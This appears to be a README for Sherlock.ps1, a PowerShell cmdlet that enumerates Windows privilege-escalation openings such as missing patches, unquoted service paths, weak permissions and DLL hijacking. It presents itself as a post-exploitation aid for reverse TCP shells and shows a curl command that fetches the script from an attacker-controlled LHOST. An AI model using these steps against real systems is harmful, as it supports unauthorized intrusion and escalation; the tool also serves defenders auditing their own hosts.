Find missing software patchs\Paths for privilege escalation (windows)
SYNOPSIS'Find missing software patchs (or vulnerabilitys) for privilege escalation on windows ( vista | 7 | 8 | 8.1 | 10 )'
Author: @_RastaMouse (Deprecated)
CmdLet: @r00t-3xp10it (v1.3)
Tested Under: Windows 10 (18363) x64 bits
______________: Windows 7 x64 bits
Required Dependencies: none
Optional Dependencies: none
PS cmdlet Dev version: v1.3
What Is Privilege Escalation and Why Is It Important?
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system admin can perform unauthorized actions.
Most computer systems are designed for use with multiple user accounts, each of which has abilities known as privileges. Common privileges include viewing and editing files, or modifying system files. Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used.
[1] - Cmdlet Description
[2] - Cmdlet Parameters
[3] - CmdLet Basic Usage
[4] - Download Cmdlet
[5] - Final Notes
[6] - Report Issues
CmdLet to find missing software patchs (or vulnerabilitys) for privilege escalation on windows ( vista | 7 | 8 | 8.1 | 10 )
This CmdLet continues @rasta-mouse (Deprecated) Module with new 2020 CVE entrys and a new function to find missing security KB patches by comparing the list of installed patches againts Sherlock KB List entrys ($dATAbASE). This Cmdlet also Searchs for 'Unquoted service paths' (EoP vulnerability) and recursive search for folders with Everyone:(F) permissions (ACL)
Sherlock CmdLet was created to be one Venom v1.0.17.7 post-exploitation auxiliary script to be executed in venom amsi
evasion reverse tcp shell's. But it can be executed in a Local environement to help Blue Teams to identify EoP entry points.
'The follow 3 steps describes how to use Sherlock post-exploitation auxiliary PS script on venom reverse tcp shells'
1º - Place this cmdlet in attacker machine apache2 webroot (bash prompt)
cp venom/aux/Sherlock.ps1 /var/www/html/Sherlock.ps1
2º - Then upload Sherlock using the reverse tcp shell prompt
cmd /c curl http://LHOST/Sherlock.ps1 -o %tmp%\Sherlock.ps1
3º - Now remote execute Sherlock using the reverse tcp shell prompt
powershell -W 1 Import-Module -Name "$Env:TMP\Sherlock.ps1" -Force;Find-AllVulns
The follow screenshot shows Sherlock beeing executed through webserver (Venom v1.0.17.7 aux script) reverse tcp shell.
[^] - Jump to Top
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-HotFixs | $null | 🚶 UserLand | Find missing KB (HotFix) security packages | Windows ( vista | 7 | 8 | 8.1 | 10 ) |
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-GroupNames | $null | 🚶 UserLand | List ALL Group Names Available | Windows ( vista | 7 | 8 | 8.1 | 10 ) |
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-Rotten | $null | 🚶 UserLand | Find Rotten Potato vuln settings (EoP) | Windows ( vista | 7 | 8 | 8.1 | 10 ) |
<rotten potato - from account to system>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-Unquoted | $null | 🚶 UserLand | Find Unquoted service vuln paths (EoP) | Windows ( vista | 7 | 8 | 8.1 | 10 ) |
<pentestlab - unquoted service path>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-Paths | $null | 🚶 UserLand | Search for folders with Everyone:(F) permissions | Windows (vista|7|8|8.1|10) |
<travisaltman - EoP by weak service permissions>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-Paths | BUILTIN\Users | 🚶 UserLand | Search for BUILTIN\Users Group Name folders | Windows (vista|7|8|8.1|10) |
<travisaltman - EoP by weak service permissions>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-RegPaths | $null | 🚶 UserLand | Find Weak Registry Permissions (EoP) | Windows ( vista | 7 | 8 | 8.1 | 10 ) |
<travisaltman - EoP by weak service permissions>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-ModifiableRegPaths | $null | 🚶 UserLand | Find Srv registry keys with User:(M) | W ( vista | 7 | 8 | 8.1 | 10 ) |
<travisaltman - EoP by weak service permissions>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-DllHijack | EnvPaths | 🚶 UserLand | Finds all %PATH% .DLL hijacking opportunities. | W (vista|7|8|8.1|10) |
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Get-DllHijack | $null | 🚶 UserLand | Scan's for DLL's prone to hijacking (@adamkramer) | W (vista|7|8|8.1|10) |
Remark: dll_hijack_detect binary might be flag 'suspicious' by Anti-Virus, but it still executes (Just dont send samples to $M)
<adamkramer - Detecting dll hijacking on windows>
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Find-AllVulns | $null | 🚶 UserLand | Scan's for CVE's (EoP) using Sherlock $dATAbASE | W (vista|7|8|8.1|10) |
| Function | Argument | Privileges | Description | Supported |
|---|---|---|---|---|
| Use-AllModules | $null | 🚶 UserLand | Run ALL Sherlock enumeration modules | W (vista|7|8|8.1|10) |
| Use-AllModules | FullRecon | 🚶 UserLand | Run Sherlock FullRecon enumeration modules | W (vista|7|8|8.1|10) |
[^] - Jump to Top
Remark: Sherlock by default uses 'Everyone' (Group Name) to search for 'FullControl' privileges set. (weak folders|services)
Remark: Allways use double quotes if the 'Group Name' contains any 'empty spaces' in argument declarations.
Recomended Group Names to search for EoP vulnerabilitys
Vulnerable Group Name Permissions Severity Sherlock Scan
--------------------- ----------- -------- -------------
Everyone FullControl Higth Automatic
BUILTIN\Users FullControl Medium Manual
NT AUTHORITY\INTERACTIVE FullControl Medium Manual
Remark: If executed 'PS C:\> Use-AllModules FullRecon' then ALL vulnerable Group Names will be scanned
Recomended permissions to search for EoP vulnerabilitys
Permissions icacls Severity Sherlock Scan
----------- ------ -------- -------------
FullControl (F) Higth Automatic
Write (W) Higth Manual
ReadAndExecute (RX) Medium Manual
Modify (M) Medium Manual
Remark: If executed 'PS C:\> Use-AllModules FullRecon' then Permissions (F) (W) (M) will be scanned.
Get-Help Cmdlet
Get-Help .\Sherlock.ps1 -full
Import Module
SYNTAX : Import-Module -Name <Absoluct-Path> -Force
Import-Module -Name $Env:TMP\Sherlock.ps1 -Force
List allGroup Names available
Get-GroupNames
Find missing KB (HotFix) patches
Get-HotFixs
Find Rotten Potato vulnerable settings
Get-Rotten
Find Unquoted service vuln paths
Get-Unquoted
Find folders with Everyone:(F) permissions
Get-Paths
Find folders with Everyone:(ReadAndExecute) permissions
SYNTAX : Get-Paths <FileSystemRights>
Get-Paths ReadAndExecute
Find folders with BUILTIN\Users:(FullControl) permissions
SYNTAX : Get-Paths <FileSystemRights> <IdentityReference>
Get-Paths FullControl BUILTIN\Users
Find Weak Services Registry Permissions - Everyone:(F)
Get-RegPaths
Find Weak Services Registry Permissions - BUILTIN\Users:(F)
SYNTAX : Get-RegPaths <IdentityReference>
Get-RegPaths BUILTIN\Users
Checks the permissions of registry keys and returns the ones that the current user can modify.
Get-ModifiableRegPaths
Scan's for DLL's Prone to Hijacking
Get-DllHijack
Finds all %PATH% .DLL hijacking opportunities.
Get-DllHijack EnvPaths
Scan's for CVE's (EoP) using Sherlock $dATAbASE
Find-AllVulns
Use ALL Sherlock Modules at once (all-functions)
Use-AllModules
Use ALL Sherlock Modules at once (All-functions With Manual Args User Imputs)
Get-HotFixs;Get-Rotten;Get-Paths ReadAndExecute BUILTIN\Users;Get-RegPaths BUILTIN\Administrators;Find-AllVulns
[^] - Jump to Top
Wget Download|Manual download [STABLE Version]
wget https://raw.githubusercontent.com/r00t-3xp10it/venom/master/aux/sherlock.ps1
Get-Help Cmdlet
Get-Help .\Sherlock.ps1 -full
Import Module [Mandatory]
SYNTAX : Import-Module -Name <Absoluct-Path> -Force
Import-Module -Name $Env:TMP\Sherlock.ps1 -Force
Use-AllModules (FullRecon)
Remark: FullRecon @arg scans for: Everyone, BUILTIN\Users, NT AUTHORITY\INTERACTIVE Group Names
and FullControl(F), Write(W), Modify(M) Permissions recursive of $Env:PROGRAMFILES|PROGRAMFILES(x86) folders.
FullRecon @argument will auto-detect target host Group Names in diferent languages ( English, Portuguese ,France ,Etc .. )
Use-AllModules FullRecon
[^] - Jump to Top
Sherlock has proven to be a project in permanent development, simply because escalation of privileges encompasses many diferent techniques. For that reason I will continue to develop Sherlock whenever possible. (with new version releases)
Current ChangeLog
Version Update Date Update Info Description DevStage Repo
------- ----------- ------------- ----------- -------- ----
v1.3 01/01/2021 Oficial Release Released sherlock version v1.3 STABLE GitHub
v1.3.1 02/01/2021 CVE-2020-0986 splWOW64.sys Local Elevation of Privileges BETA Gist
v1.3.1 02/01/2021 Unquoted services $_.StartName -ieq 'LocalSystem' filter added BETA Gist
v1.3.1 02/01/2021 Get-DllHijack Search for dll's prone to hijacking function BETA Gist
v1.3.1 02/01/2021 $M CVE assign nº CVE-2020-0986 assigned to CVE-2020-17008 BETA Gist
V1.3.1 03/01/2021 Oficial Release Released Sherlock version v1.3.1 STABLE GitHub
v1.3.2 04/01/2021 Get-DllHijack Corrupted download checks (x86|x64) bugfix BETA Gist
v1.3.2 04/01/2021 Get-DllHijack &"$Env:TMP\$ArchiveName.exe" (Ampersand exec) BETA Gist
v1.3.2 04/01/2021 Get-DllHijack EnvPaths @argument added to Get-DllHijack BETA Gist (*)
v1.3.2 04/01/2021 Use-AllModules Run ALL Sherlock enumeration modules BETA Gist
v1.3.2 05/01/2021 Oficial Release Released Sherlock version v1.3.2 STABLE GitHub
v1.3.3 05/01/2021 Use-AllModules FullRecon enumeration @argument added BETA Gist
v1.3.3 06/01/2021 CVE-2020-25106 SUPREMO (rat) Local Privilege Escalation BETA Gist
v1.3.3 06/01/2021 Get-HotFixs Windows 8.1 x64 bits HotFix database BETA Gist
v1.3.3 06/01/2021 CVE-2020-1048 Ualapi.dll Microsoft Spooler Local EoP BETA Gist
v1.3.3 06/02/2021 Use-AllModules FullRecon @argument searchs for cmdkey creds BETA Gist
v1.3.3 08/01/2021 CVE-2020-5752 Bypassing Anti-Virus amsi string detection BETA Gist
v1.3.3 08/01/2021 Oficial Release Released Sherlock version v1.3.3 STABLE GitHub
v1.3.4 12/01/2021 Get-ModifiableRegPaths new EoP scan technic added to Sherlock BETA Gist
v1.3.4 13/01/2021 Get-GroupNames List ALL Group Names Available BETA Gist
v1.3.4 13/01/2021 Get-HotFixs Windows 10 x64 bits KB list update BETA Gist
v1.3.4 13/01/2021 CVE-2021-1642 AppX Deployment Service (AppXSVC) EoP BETA Gist
v1.3.4 15/01/2021 Oficial Release Released Sherlock version v1.3.4 STABLE GitHub
(*) Checks if the current %PATH% has any directories that are writeable (W) by the current user.
Sherlock v1.3.4 [BETA] https://gist.github.com/r00t-3xp10it/7438f5b5dcb7fd02f7bf6dcca64959ee
Url: https://www.exploit-db.com/
Url: https://0day.today/platforms/windows
Url: https://packetstormsecurity.com/files/os/windows/
Url: https://github.com/r00t-3xp10it/venom/blob/master/aux/sherlock.ps1
Url: https://medium.com/bugbountywriteup/privilege-escalation-in-windows-380bee3a2842
Url: http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/
Url: https://github.com/r00t-3xp10it/venom/wiki/CmdLine-&-Scripts-for-reverse-TCP-shell-addicts
Url: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
[^] - Jump to Top